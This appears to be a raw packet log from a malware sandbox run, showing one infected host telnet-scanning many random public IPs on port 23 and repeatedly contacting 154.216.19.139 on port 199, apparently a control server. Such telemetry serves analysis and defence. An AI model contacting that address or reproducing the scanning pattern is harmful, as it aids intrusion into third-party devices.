                                          Dec 5, 2024 08:02:49.952183008 CET3352423192.168.2.2344.154.217.157
                                          Dec 5, 2024 08:02:49.952195883 CET4850023192.168.2.23121.177.189.157
                                          Dec 5, 2024 08:02:49.952208042 CET5731223192.168.2.23175.191.68.88
                                          Dec 5, 2024 08:02:49.952212095 CET2347002211.218.239.156192.168.2.23
                                          Dec 5, 2024 08:02:49.952224016 CET2332842116.31.85.121192.168.2.23
                                          Dec 5, 2024 08:02:49.952246904 CET4700223192.168.2.23211.218.239.156
                                          Dec 5, 2024 08:02:49.952244043 CET3284223192.168.2.23116.31.85.121
                                          Dec 5, 2024 08:02:49.952281952 CET235251012.78.245.231192.168.2.23
                                          Dec 5, 2024 08:02:49.952291965 CET2354562122.208.231.185192.168.2.23
                                          Dec 5, 2024 08:02:49.952302933 CET233703297.30.217.167192.168.2.23
                                          Dec 5, 2024 08:02:49.952318907 CET5251023192.168.2.2312.78.245.231
                                          Dec 5, 2024 08:02:49.952322006 CET5456223192.168.2.23122.208.231.185
                                          Dec 5, 2024 08:02:49.952346087 CET3703223192.168.2.2397.30.217.167
                                          Dec 5, 2024 08:02:49.952353954 CET2360122139.21.121.102192.168.2.23
                                          Dec 5, 2024 08:02:49.952366114 CET2340084191.79.127.213192.168.2.23
                                          Dec 5, 2024 08:02:49.952377081 CET2343056150.61.48.142192.168.2.23
                                          Dec 5, 2024 08:02:49.952385902 CET6012223192.168.2.23139.21.121.102
                                          Dec 5, 2024 08:02:49.952402115 CET234259639.253.242.12192.168.2.23
                                          Dec 5, 2024 08:02:49.952403069 CET4008423192.168.2.23191.79.127.213
                                          Dec 5, 2024 08:02:49.952406883 CET4305623192.168.2.23150.61.48.142
                                          Dec 5, 2024 08:02:49.952414036 CET2345244218.43.149.218192.168.2.23
                                          Dec 5, 2024 08:02:49.952436924 CET235055683.94.159.199192.168.2.23
                                          Dec 5, 2024 08:02:49.952436924 CET4259623192.168.2.2339.253.242.12
                                          Dec 5, 2024 08:02:49.952444077 CET4524423192.168.2.23218.43.149.218
                                          Dec 5, 2024 08:02:49.952467918 CET2350588116.126.230.31192.168.2.23
                                          Dec 5, 2024 08:02:49.952470064 CET5055623192.168.2.2383.94.159.199
                                          Dec 5, 2024 08:02:49.952507973 CET5058823192.168.2.23116.126.230.31
                                          Dec 5, 2024 08:02:49.952529907 CET235758888.241.232.173192.168.2.23
                                          Dec 5, 2024 08:02:49.952539921 CET235101473.168.122.219192.168.2.23
                                          Dec 5, 2024 08:02:49.952548981 CET234251649.86.94.59192.168.2.23
                                          Dec 5, 2024 08:02:49.952558994 CET235759066.111.1.41192.168.2.23
                                          Dec 5, 2024 08:02:49.952562094 CET5758823192.168.2.2388.241.232.173
                                          Dec 5, 2024 08:02:49.952584982 CET4251623192.168.2.2349.86.94.59
                                          Dec 5, 2024 08:02:49.952586889 CET5759023192.168.2.2366.111.1.41
                                          Dec 5, 2024 08:02:49.952589989 CET5101423192.168.2.2373.168.122.219
                                          Dec 5, 2024 08:02:49.952688932 CET2336354182.79.105.76192.168.2.23
                                          Dec 5, 2024 08:02:49.952701092 CET2357890138.153.76.148192.168.2.23
                                          Dec 5, 2024 08:02:49.952709913 CET234112222.51.246.174192.168.2.23
                                          Dec 5, 2024 08:02:49.952729940 CET5789023192.168.2.23138.153.76.148
                                          Dec 5, 2024 08:02:49.952732086 CET3635423192.168.2.23182.79.105.76
                                          Dec 5, 2024 08:02:49.952734947 CET4112223192.168.2.2322.51.246.174
                                          Dec 5, 2024 08:02:49.953083992 CET2337058126.178.131.206192.168.2.23
                                          Dec 5, 2024 08:02:49.953097105 CET2358400135.104.249.188192.168.2.23
                                          Dec 5, 2024 08:02:49.953120947 CET3705823192.168.2.23126.178.131.206
                                          Dec 5, 2024 08:02:49.953125000 CET235390421.160.33.184192.168.2.23
                                          Dec 5, 2024 08:02:49.953125954 CET5840023192.168.2.23135.104.249.188
                                          Dec 5, 2024 08:02:49.953136921 CET2359248187.103.242.245192.168.2.23
                                          Dec 5, 2024 08:02:49.953155041 CET235435288.204.146.7192.168.2.23
                                          Dec 5, 2024 08:02:49.953162909 CET5390423192.168.2.2321.160.33.184
                                          Dec 5, 2024 08:02:49.953171968 CET5924823192.168.2.23187.103.242.245
                                          Dec 5, 2024 08:02:49.953190088 CET2348872119.20.76.243192.168.2.23
                                          Dec 5, 2024 08:02:49.953191996 CET5435223192.168.2.2388.204.146.7
                                          Dec 5, 2024 08:02:49.953222036 CET4887223192.168.2.23119.20.76.243
                                          Dec 5, 2024 08:02:49.953243971 CET2356594116.24.104.134192.168.2.23
                                          Dec 5, 2024 08:02:49.953255892 CET233708658.10.75.114192.168.2.23
                                          Dec 5, 2024 08:02:49.953264952 CET2341856219.235.6.49192.168.2.23
                                          Dec 5, 2024 08:02:49.953273058 CET5659423192.168.2.23116.24.104.134
                                          Dec 5, 2024 08:02:49.953282118 CET3708623192.168.2.2358.10.75.114
                                          Dec 5, 2024 08:02:49.953284979 CET4185623192.168.2.23219.235.6.49
                                          Dec 5, 2024 08:02:49.953330040 CET2347540196.208.109.239192.168.2.23
                                          Dec 5, 2024 08:02:49.953340054 CET233956686.3.196.5192.168.2.23
                                          Dec 5, 2024 08:02:49.953351021 CET234374886.188.53.172192.168.2.23
                                          Dec 5, 2024 08:02:49.953365088 CET4754023192.168.2.23196.208.109.239
                                          Dec 5, 2024 08:02:49.953368902 CET2339968159.32.231.50192.168.2.23
                                          Dec 5, 2024 08:02:49.953377962 CET4374823192.168.2.2386.188.53.172
                                          Dec 5, 2024 08:02:49.953380108 CET3956623192.168.2.2386.3.196.5
                                          Dec 5, 2024 08:02:49.953380108 CET233566641.244.104.33192.168.2.23
                                          Dec 5, 2024 08:02:49.953397036 CET3996823192.168.2.23159.32.231.50
                                          Dec 5, 2024 08:02:49.953413963 CET3566623192.168.2.2341.244.104.33
                                          Dec 5, 2024 08:02:49.953413963 CET2335570101.75.160.223192.168.2.23
                                          Dec 5, 2024 08:02:49.953424931 CET2341092186.8.160.224192.168.2.23
                                          Dec 5, 2024 08:02:49.953435898 CET2351710157.246.109.62192.168.2.23
                                          Dec 5, 2024 08:02:49.953453064 CET3557023192.168.2.23101.75.160.223
                                          Dec 5, 2024 08:02:49.953458071 CET4109223192.168.2.23186.8.160.224
                                          Dec 5, 2024 08:02:49.953471899 CET5171023192.168.2.23157.246.109.62
                                          Dec 5, 2024 08:02:49.953490973 CET234581088.11.252.160192.168.2.23
                                          Dec 5, 2024 08:02:49.953505993 CET235620048.155.61.30192.168.2.23
                                          Dec 5, 2024 08:02:49.953516006 CET2359794219.82.58.82192.168.2.23
                                          Dec 5, 2024 08:02:49.953541040 CET5620023192.168.2.2348.155.61.30
                                          Dec 5, 2024 08:02:49.953541040 CET5979423192.168.2.23219.82.58.82
                                          Dec 5, 2024 08:02:49.953555107 CET4581023192.168.2.2388.11.252.160
                                          Dec 5, 2024 08:02:49.953613043 CET233784826.127.145.209192.168.2.23
                                          Dec 5, 2024 08:02:49.953632116 CET2337800192.81.84.23192.168.2.23
                                          Dec 5, 2024 08:02:49.953658104 CET3780023192.168.2.23192.81.84.23
                                          Dec 5, 2024 08:02:49.953660965 CET3784823192.168.2.2326.127.145.209
                                          Dec 5, 2024 08:02:49.954027891 CET235825664.197.192.50192.168.2.23
                                          Dec 5, 2024 08:02:49.954047918 CET2348822139.157.203.71192.168.2.23
                                          Dec 5, 2024 08:02:49.954071999 CET5825623192.168.2.2364.197.192.50
                                          Dec 5, 2024 08:02:49.954087019 CET4882223192.168.2.23139.157.203.71
                                          Dec 5, 2024 08:02:49.954099894 CET235708868.217.38.17192.168.2.23
                                          Dec 5, 2024 08:02:49.954109907 CET233978853.156.2.56192.168.2.23
                                          Dec 5, 2024 08:02:49.954121113 CET235202411.126.189.65192.168.2.23
                                          Dec 5, 2024 08:02:49.954133034 CET2354296208.14.132.76192.168.2.23
                                          Dec 5, 2024 08:02:49.954134941 CET5708823192.168.2.2368.217.38.17
                                          Dec 5, 2024 08:02:49.954138041 CET3978823192.168.2.2353.156.2.56
                                          Dec 5, 2024 08:02:49.954161882 CET5202423192.168.2.2311.126.189.65
                                          Dec 5, 2024 08:02:49.954165936 CET5429623192.168.2.23208.14.132.76
                                          Dec 5, 2024 08:02:49.954185963 CET2340124154.194.52.21192.168.2.23
                                          Dec 5, 2024 08:02:49.954196930 CET234009249.144.37.64192.168.2.23
                                          Dec 5, 2024 08:02:49.954230070 CET4012423192.168.2.23154.194.52.21
                                          Dec 5, 2024 08:02:49.954230070 CET4009223192.168.2.2349.144.37.64
                                          Dec 5, 2024 08:02:49.954231977 CET234159232.135.216.72192.168.2.23
                                          Dec 5, 2024 08:02:49.954243898 CET2352456215.136.166.39192.168.2.23
                                          Dec 5, 2024 08:02:49.954268932 CET5245623192.168.2.23215.136.166.39
                                          Dec 5, 2024 08:02:49.954271078 CET233717636.163.114.52192.168.2.23
                                          Dec 5, 2024 08:02:49.954273939 CET4159223192.168.2.2332.135.216.72
                                          Dec 5, 2024 08:02:49.954283953 CET2359530131.255.253.249192.168.2.23
                                          Dec 5, 2024 08:02:49.954296112 CET235059056.140.154.121192.168.2.23
                                          Dec 5, 2024 08:02:49.954308987 CET3717623192.168.2.2336.163.114.52
                                          Dec 5, 2024 08:02:49.954324961 CET5059023192.168.2.2356.140.154.121
                                          Dec 5, 2024 08:02:49.954339027 CET5953023192.168.2.23131.255.253.249
                                          Dec 5, 2024 08:02:49.954344988 CET2346122189.255.81.119192.168.2.23
                                          Dec 5, 2024 08:02:49.954355955 CET2350762144.168.24.148192.168.2.23
                                          Dec 5, 2024 08:02:49.954365015 CET234801036.82.145.157192.168.2.23
                                          Dec 5, 2024 08:02:49.954376936 CET2335950217.250.67.26192.168.2.23
                                          Dec 5, 2024 08:02:49.954386950 CET2355280166.153.125.255192.168.2.23
                                          Dec 5, 2024 08:02:49.954396009 CET5076223192.168.2.23144.168.24.148
                                          Dec 5, 2024 08:02:49.954415083 CET4801023192.168.2.2336.82.145.157
                                          Dec 5, 2024 08:02:49.954416990 CET4612223192.168.2.23189.255.81.119
                                          Dec 5, 2024 08:02:49.954431057 CET3595023192.168.2.23217.250.67.26
                                          Dec 5, 2024 08:02:49.954431057 CET5528023192.168.2.23166.153.125.255
                                          Dec 5, 2024 08:02:49.954524040 CET2347682121.145.192.109192.168.2.23
                                          Dec 5, 2024 08:02:49.954535007 CET234499278.79.41.122192.168.2.23
                                          Dec 5, 2024 08:02:49.954545021 CET233715818.10.246.197192.168.2.23
                                          Dec 5, 2024 08:02:49.954551935 CET4768223192.168.2.23121.145.192.109
                                          Dec 5, 2024 08:02:49.954555988 CET233621837.65.113.12192.168.2.23
                                          Dec 5, 2024 08:02:49.954576969 CET3715823192.168.2.2318.10.246.197
                                          Dec 5, 2024 08:02:49.954576969 CET4499223192.168.2.2378.79.41.122
                                          Dec 5, 2024 08:02:49.954595089 CET3621823192.168.2.2337.65.113.12
                                          Dec 5, 2024 08:02:49.954972982 CET233954846.250.181.70192.168.2.23
                                          Dec 5, 2024 08:02:49.954992056 CET235658861.233.196.40192.168.2.23
                                          Dec 5, 2024 08:02:49.955008030 CET3954823192.168.2.2346.250.181.70
                                          Dec 5, 2024 08:02:49.955020905 CET5658823192.168.2.2361.233.196.40
                                          Dec 5, 2024 08:02:49.955039978 CET233987227.123.203.123192.168.2.23
                                          Dec 5, 2024 08:02:49.955070972 CET3987223192.168.2.2327.123.203.123
                                          Dec 5, 2024 08:02:49.955071926 CET2340862147.201.255.206192.168.2.23
                                          Dec 5, 2024 08:02:49.955085039 CET2344812113.177.123.244192.168.2.23
                                          Dec 5, 2024 08:02:49.955101967 CET4086223192.168.2.23147.201.255.206
                                          Dec 5, 2024 08:02:49.955142021 CET4481223192.168.2.23113.177.123.244
                                          Dec 5, 2024 08:02:49.955178022 CET2357400138.226.170.110192.168.2.23
                                          Dec 5, 2024 08:02:49.955188990 CET234760680.205.19.197192.168.2.23
                                          Dec 5, 2024 08:02:49.955233097 CET4760623192.168.2.2380.205.19.197
                                          Dec 5, 2024 08:02:49.955234051 CET5740023192.168.2.23138.226.170.110
                                          Dec 5, 2024 08:02:49.955235004 CET233669819.1.248.192192.168.2.23
                                          Dec 5, 2024 08:02:49.955246925 CET233954454.208.207.93192.168.2.23
                                          Dec 5, 2024 08:02:49.955265999 CET2353782111.15.95.101192.168.2.23
                                          Dec 5, 2024 08:02:49.955271006 CET3669823192.168.2.2319.1.248.192
                                          Dec 5, 2024 08:02:49.955272913 CET3954423192.168.2.2354.208.207.93
                                          Dec 5, 2024 08:02:49.955276012 CET234941849.52.200.230192.168.2.23
                                          Dec 5, 2024 08:02:49.955291986 CET5378223192.168.2.23111.15.95.101
                                          Dec 5, 2024 08:02:49.955300093 CET2340326193.8.57.105192.168.2.23
                                          Dec 5, 2024 08:02:49.955305099 CET4941823192.168.2.2349.52.200.230
                                          Dec 5, 2024 08:02:49.955346107 CET4032623192.168.2.23193.8.57.105
                                          Dec 5, 2024 08:02:49.955379009 CET2358298114.232.54.239192.168.2.23
                                          Dec 5, 2024 08:02:49.955389977 CET2350738107.248.86.231192.168.2.23
                                          Dec 5, 2024 08:02:49.955399990 CET233546429.249.30.124192.168.2.23
                                          Dec 5, 2024 08:02:49.955418110 CET5829823192.168.2.23114.232.54.239
                                          Dec 5, 2024 08:02:49.955418110 CET5073823192.168.2.23107.248.86.231
                                          Dec 5, 2024 08:02:49.955421925 CET2356422164.237.248.89192.168.2.23
                                          Dec 5, 2024 08:02:49.955430984 CET3546423192.168.2.2329.249.30.124
                                          Dec 5, 2024 08:02:49.955435038 CET2340174108.130.142.170192.168.2.23
                                          Dec 5, 2024 08:02:49.955451012 CET233817292.61.78.162192.168.2.23
                                          Dec 5, 2024 08:02:49.955456018 CET5642223192.168.2.23164.237.248.89
                                          Dec 5, 2024 08:02:49.955471039 CET4017423192.168.2.23108.130.142.170
                                          Dec 5, 2024 08:02:49.955475092 CET2341448198.5.158.151192.168.2.23
                                          Dec 5, 2024 08:02:49.955486059 CET235867216.90.195.142192.168.2.23
                                          Dec 5, 2024 08:02:49.955502987 CET3817223192.168.2.2392.61.78.162
                                          Dec 5, 2024 08:02:49.955513954 CET4144823192.168.2.23198.5.158.151
                                          Dec 5, 2024 08:02:49.955518007 CET5867223192.168.2.2316.90.195.142
                                          Dec 5, 2024 08:02:49.955579042 CET2334044105.111.169.139192.168.2.23
                                          Dec 5, 2024 08:02:49.955593109 CET235888465.241.23.79192.168.2.23
                                          Dec 5, 2024 08:02:49.955616951 CET3404423192.168.2.23105.111.169.139
                                          Dec 5, 2024 08:02:49.955638885 CET5888423192.168.2.2365.241.23.79
                                          Dec 5, 2024 08:02:49.956088066 CET2336100107.7.192.212192.168.2.23
                                          Dec 5, 2024 08:02:49.956098080 CET2342294164.131.85.26192.168.2.23
                                          Dec 5, 2024 08:02:49.956115007 CET235494897.99.188.128192.168.2.23
                                          Dec 5, 2024 08:02:49.956125975 CET2355470168.212.74.188192.168.2.23
                                          Dec 5, 2024 08:02:49.956127882 CET3610023192.168.2.23107.7.192.212
                                          Dec 5, 2024 08:02:49.956137896 CET235500046.205.168.229192.168.2.23
                                          Dec 5, 2024 08:02:49.956140041 CET4229423192.168.2.23164.131.85.26
                                          Dec 5, 2024 08:02:49.956146955 CET5494823192.168.2.2397.99.188.128
                                          Dec 5, 2024 08:02:49.956159115 CET5547023192.168.2.23168.212.74.188
                                          Dec 5, 2024 08:02:49.956163883 CET5500023192.168.2.2346.205.168.229
                                          Dec 5, 2024 08:02:49.956219912 CET234650668.117.139.38192.168.2.23
                                          Dec 5, 2024 08:02:49.956231117 CET2360404102.20.168.0192.168.2.23
                                          Dec 5, 2024 08:02:49.956250906 CET4650623192.168.2.2368.117.139.38
                                          Dec 5, 2024 08:02:49.956252098 CET2340766149.212.228.32192.168.2.23
                                          Dec 5, 2024 08:02:49.956263065 CET6040423192.168.2.23102.20.168.0
                                          Dec 5, 2024 08:02:49.956293106 CET4076623192.168.2.23149.212.228.32
                                          Dec 5, 2024 08:02:49.956295013 CET2353524188.164.69.107192.168.2.23
                                          Dec 5, 2024 08:02:49.956305981 CET2335740177.167.178.56192.168.2.23
                                          Dec 5, 2024 08:02:49.956327915 CET5352423192.168.2.23188.164.69.107
                                          Dec 5, 2024 08:02:49.956331015 CET3574023192.168.2.23177.167.178.56
                                          Dec 5, 2024 08:02:49.956386089 CET2338912159.19.209.164192.168.2.23
                                          Dec 5, 2024 08:02:49.956397057 CET234031218.64.241.39192.168.2.23
                                          Dec 5, 2024 08:02:49.956407070 CET2353852106.200.173.19192.168.2.23
                                          Dec 5, 2024 08:02:49.956417084 CET3891223192.168.2.23159.19.209.164
                                          Dec 5, 2024 08:02:49.956418991 CET234814829.113.94.55192.168.2.23
                                          Dec 5, 2024 08:02:49.956427097 CET4031223192.168.2.2318.64.241.39
                                          Dec 5, 2024 08:02:49.956438065 CET2337902174.88.124.185192.168.2.23
                                          Dec 5, 2024 08:02:49.956438065 CET5385223192.168.2.23106.200.173.19
                                          Dec 5, 2024 08:02:49.956449986 CET2338496140.35.152.3192.168.2.23
                                          Dec 5, 2024 08:02:49.956465006 CET2335000163.112.139.45192.168.2.23
                                          Dec 5, 2024 08:02:49.956468105 CET4814823192.168.2.2329.113.94.55
                                          Dec 5, 2024 08:02:49.956470013 CET3790223192.168.2.23174.88.124.185
                                          Dec 5, 2024 08:02:49.956475019 CET3849623192.168.2.23140.35.152.3
                                          Dec 5, 2024 08:02:49.956475973 CET235633848.48.234.153192.168.2.23
                                          Dec 5, 2024 08:02:49.956496954 CET3500023192.168.2.23163.112.139.45
                                          Dec 5, 2024 08:02:49.956540108 CET5633823192.168.2.2348.48.234.153
                                          Dec 5, 2024 08:02:49.956559896 CET234687278.203.215.202192.168.2.23
                                          Dec 5, 2024 08:02:49.956571102 CET2360422128.25.97.132192.168.2.23
                                          Dec 5, 2024 08:02:49.956583023 CET233823079.101.112.237192.168.2.23
                                          Dec 5, 2024 08:02:49.956588030 CET4687223192.168.2.2378.203.215.202
                                          Dec 5, 2024 08:02:49.956600904 CET235742245.71.25.54192.168.2.23
                                          Dec 5, 2024 08:02:49.956602097 CET6042223192.168.2.23128.25.97.132
                                          Dec 5, 2024 08:02:49.956621885 CET3823023192.168.2.2379.101.112.237
                                          Dec 5, 2024 08:02:49.956655979 CET5742223192.168.2.2345.71.25.54
                                          Dec 5, 2024 08:02:49.957015038 CET234482826.38.126.244192.168.2.23
                                          Dec 5, 2024 08:02:49.957032919 CET2357666151.114.66.86192.168.2.23
                                          Dec 5, 2024 08:02:49.957043886 CET234180457.159.205.203192.168.2.23
                                          Dec 5, 2024 08:02:49.957053900 CET4482823192.168.2.2326.38.126.244
                                          Dec 5, 2024 08:02:49.957068920 CET5766623192.168.2.23151.114.66.86
                                          Dec 5, 2024 08:02:49.957072020 CET233501076.14.39.41192.168.2.23
                                          Dec 5, 2024 08:02:49.957089901 CET4180423192.168.2.2357.159.205.203
                                          Dec 5, 2024 08:02:49.957106113 CET3501023192.168.2.2376.14.39.41
                                          Dec 5, 2024 08:02:49.957124949 CET23600885.18.62.230192.168.2.23
                                          Dec 5, 2024 08:02:49.957138062 CET235290635.110.47.19192.168.2.23
                                          Dec 5, 2024 08:02:49.957161903 CET6008823192.168.2.235.18.62.230
                                          Dec 5, 2024 08:02:49.957171917 CET5290623192.168.2.2335.110.47.19
                                          Dec 5, 2024 08:02:49.957195997 CET2346082211.200.199.151192.168.2.23
                                          Dec 5, 2024 08:02:49.957206011 CET23585441.126.222.164192.168.2.23
                                          Dec 5, 2024 08:02:49.957218885 CET2352390172.175.32.64192.168.2.23
                                          Dec 5, 2024 08:02:49.957230091 CET4608223192.168.2.23211.200.199.151
                                          Dec 5, 2024 08:02:49.957230091 CET5854423192.168.2.231.126.222.164
                                          Dec 5, 2024 08:02:49.957251072 CET5239023192.168.2.23172.175.32.64
                                          Dec 5, 2024 08:02:49.957277060 CET2341972163.146.76.9192.168.2.23
                                          Dec 5, 2024 08:02:49.957287073 CET23526089.237.213.78192.168.2.23
                                          Dec 5, 2024 08:02:49.957295895 CET2359374133.202.32.185192.168.2.23
                                          Dec 5, 2024 08:02:49.957314014 CET4197223192.168.2.23163.146.76.9
                                          Dec 5, 2024 08:02:49.957314968 CET2342396193.84.59.198192.168.2.23
                                          Dec 5, 2024 08:02:49.957324982 CET5260823192.168.2.239.237.213.78
                                          Dec 5, 2024 08:02:49.957326889 CET2346742216.240.251.4192.168.2.23
                                          Dec 5, 2024 08:02:49.957330942 CET5937423192.168.2.23133.202.32.185
                                          Dec 5, 2024 08:02:49.957345009 CET4239623192.168.2.23193.84.59.198
                                          Dec 5, 2024 08:02:49.957356930 CET4674223192.168.2.23216.240.251.4
                                          Dec 5, 2024 08:02:49.957386971 CET236037681.97.1.51192.168.2.23
                                          Dec 5, 2024 08:02:49.957397938 CET2341980130.250.11.206192.168.2.23
                                          Dec 5, 2024 08:02:49.957406998 CET234728455.48.154.119192.168.2.23
                                          Dec 5, 2024 08:02:49.957418919 CET235172649.131.105.123192.168.2.23
                                          Dec 5, 2024 08:02:49.957425117 CET4728423192.168.2.2355.48.154.119
                                          Dec 5, 2024 08:02:49.957427979 CET6037623192.168.2.2381.97.1.51
                                          Dec 5, 2024 08:02:49.957431078 CET4198023192.168.2.23130.250.11.206
                                          Dec 5, 2024 08:02:49.957448006 CET2360628143.191.157.249192.168.2.23
                                          Dec 5, 2024 08:02:49.957449913 CET5172623192.168.2.2349.131.105.123
                                          Dec 5, 2024 08:02:49.957458973 CET2351448194.145.118.247192.168.2.23
                                          Dec 5, 2024 08:02:49.957487106 CET6062823192.168.2.23143.191.157.249
                                          Dec 5, 2024 08:02:49.957499981 CET5144823192.168.2.23194.145.118.247
                                          Dec 5, 2024 08:02:49.957516909 CET235445477.219.167.39192.168.2.23
                                          Dec 5, 2024 08:02:49.957528114 CET23581885.102.186.168192.168.2.23
                                          Dec 5, 2024 08:02:49.957551003 CET5818823192.168.2.235.102.186.168
                                          Dec 5, 2024 08:02:49.957606077 CET5445423192.168.2.2377.219.167.39
                                          Dec 5, 2024 08:02:49.957928896 CET234932047.159.109.247192.168.2.23
                                          Dec 5, 2024 08:02:49.957940102 CET235766452.160.229.236192.168.2.23
                                          Dec 5, 2024 08:02:49.957966089 CET4932023192.168.2.2347.159.109.247
                                          Dec 5, 2024 08:02:49.957971096 CET5766423192.168.2.2352.160.229.236
                                          Dec 5, 2024 08:02:49.957976103 CET2342524141.22.216.117192.168.2.23
                                          Dec 5, 2024 08:02:49.957988977 CET235213693.69.61.87192.168.2.23
                                          Dec 5, 2024 08:02:49.958019972 CET5213623192.168.2.2393.69.61.87
                                          Dec 5, 2024 08:02:49.958029032 CET4252423192.168.2.23141.22.216.117
                                          Dec 5, 2024 08:02:49.958031893 CET235175062.163.203.230192.168.2.23
                                          Dec 5, 2024 08:02:49.958062887 CET235650896.222.218.77192.168.2.23
                                          Dec 5, 2024 08:02:49.958072901 CET5175023192.168.2.2362.163.203.230
                                          Dec 5, 2024 08:02:49.958092928 CET5650823192.168.2.2396.222.218.77
                                          Dec 5, 2024 08:02:49.958098888 CET234943668.217.169.32192.168.2.23
                                          Dec 5, 2024 08:02:49.958115101 CET2359952152.47.87.165192.168.2.23
                                          Dec 5, 2024 08:02:49.958127975 CET4943623192.168.2.2368.217.169.32
                                          Dec 5, 2024 08:02:49.958138943 CET2338612183.56.68.202192.168.2.23
                                          Dec 5, 2024 08:02:49.958148956 CET234724611.28.221.113192.168.2.23
                                          Dec 5, 2024 08:02:49.958169937 CET3861223192.168.2.23183.56.68.202
                                          Dec 5, 2024 08:02:49.958175898 CET5995223192.168.2.23152.47.87.165
                                          Dec 5, 2024 08:02:49.958178997 CET4724623192.168.2.2311.28.221.113
                                          Dec 5, 2024 08:02:49.958194971 CET235561093.245.89.62192.168.2.23
                                          Dec 5, 2024 08:02:49.958205938 CET234698811.186.51.13192.168.2.23
                                          Dec 5, 2024 08:02:49.958225012 CET5561023192.168.2.2393.245.89.62
                                          Dec 5, 2024 08:02:49.958235025 CET4698823192.168.2.2311.186.51.13
                                          Dec 5, 2024 08:02:49.958236933 CET233679659.194.179.68192.168.2.23
                                          Dec 5, 2024 08:02:49.958246946 CET2360346178.158.63.197192.168.2.23
                                          Dec 5, 2024 08:02:49.958273888 CET6034623192.168.2.23178.158.63.197
                                          Dec 5, 2024 08:02:49.958273888 CET3679623192.168.2.2359.194.179.68
                                          Dec 5, 2024 08:02:49.958287001 CET2345918194.77.207.106192.168.2.23
                                          Dec 5, 2024 08:02:49.958297968 CET2333226199.188.249.152192.168.2.23
                                          Dec 5, 2024 08:02:49.958314896 CET2355536131.217.222.252192.168.2.23
                                          Dec 5, 2024 08:02:49.958323002 CET4591823192.168.2.23194.77.207.106
                                          Dec 5, 2024 08:02:49.958326101 CET2335880108.189.48.62192.168.2.23
                                          Dec 5, 2024 08:02:49.958327055 CET3322623192.168.2.23199.188.249.152
                                          Dec 5, 2024 08:02:49.958348989 CET5553623192.168.2.23131.217.222.252
                                          Dec 5, 2024 08:02:49.958380938 CET3588023192.168.2.23108.189.48.62
                                          Dec 5, 2024 08:02:49.958415031 CET235002014.234.225.230192.168.2.23
                                          Dec 5, 2024 08:02:49.958425045 CET234288635.200.152.187192.168.2.23
                                          Dec 5, 2024 08:02:49.958435059 CET2344718144.33.193.131192.168.2.23
                                          Dec 5, 2024 08:02:49.958445072 CET2360612158.38.111.112192.168.2.23
                                          Dec 5, 2024 08:02:49.958451033 CET5002023192.168.2.2314.234.225.230
                                          Dec 5, 2024 08:02:49.958451986 CET4288623192.168.2.2335.200.152.187
                                          Dec 5, 2024 08:02:49.958458900 CET4471823192.168.2.23144.33.193.131
                                          Dec 5, 2024 08:02:49.958479881 CET6061223192.168.2.23158.38.111.112
                                          Dec 5, 2024 08:02:49.958627939 CET234182861.210.73.254192.168.2.23
                                          Dec 5, 2024 08:02:49.958664894 CET4182823192.168.2.2361.210.73.254
                                          Dec 5, 2024 08:02:49.958684921 CET2351512179.239.7.19192.168.2.23
                                          Dec 5, 2024 08:02:49.958698034 CET2346750111.113.16.140192.168.2.23
                                          Dec 5, 2024 08:02:49.958719015 CET5151223192.168.2.23179.239.7.19
                                          Dec 5, 2024 08:02:49.958726883 CET4675023192.168.2.23111.113.16.140
                                          Dec 5, 2024 08:02:49.958750010 CET234378478.107.223.24192.168.2.23
                                          Dec 5, 2024 08:02:49.958761930 CET2353560115.88.21.255192.168.2.23
                                          Dec 5, 2024 08:02:49.958785057 CET4378423192.168.2.2378.107.223.24
                                          Dec 5, 2024 08:02:49.958790064 CET2340298106.54.203.113192.168.2.23
                                          Dec 5, 2024 08:02:49.958801031 CET233810070.185.114.58192.168.2.23
                                          Dec 5, 2024 08:02:49.958811045 CET2354176156.60.17.48192.168.2.23
                                          Dec 5, 2024 08:02:49.958813906 CET5356023192.168.2.23115.88.21.255
                                          Dec 5, 2024 08:02:49.958825111 CET4029823192.168.2.23106.54.203.113
                                          Dec 5, 2024 08:02:49.958825111 CET3810023192.168.2.2370.185.114.58
                                          Dec 5, 2024 08:02:49.958828926 CET2337202106.162.255.130192.168.2.23
                                          Dec 5, 2024 08:02:49.958841085 CET234576644.232.218.63192.168.2.23
                                          Dec 5, 2024 08:02:49.958842039 CET5417623192.168.2.23156.60.17.48
                                          Dec 5, 2024 08:02:49.958861113 CET3720223192.168.2.23106.162.255.130
                                          Dec 5, 2024 08:02:49.958863020 CET4576623192.168.2.2344.232.218.63
                                          Dec 5, 2024 08:02:49.958863974 CET2358068126.235.65.123192.168.2.23
                                          Dec 5, 2024 08:02:49.958930969 CET5806823192.168.2.23126.235.65.123
                                          Dec 5, 2024 08:02:50.008491993 CET19938976154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:50.046386957 CET19939380154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:50.047422886 CET39380199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:50.059973955 CET19938976154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:50.073259115 CET39380199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:50.193043947 CET19939380154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:50.193099976 CET39380199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:50.962275028 CET43928443192.168.2.2391.189.91.42
                                          Dec 5, 2024 08:02:51.289403915 CET19938964154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:51.289480925 CET38964199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:51.413733959 CET19938966154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:51.413793087 CET38966199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:51.539777994 CET19938968154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:51.539833069 CET38968199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:51.679809093 CET19938970154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:51.679868937 CET38970199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:51.836200953 CET19938972154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:51.836258888 CET38972199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:51.976916075 CET19938974154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:51.976978064 CET38974199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:52.101205111 CET19938976154.216.19.139192.168.2.23
                                          Dec 5, 2024 08:02:52.101317883 CET38976199192.168.2.23154.216.19.139
                                          Dec 5, 2024 08:02:56.593481064 CET42836443192.168.2.2391.189.91.43
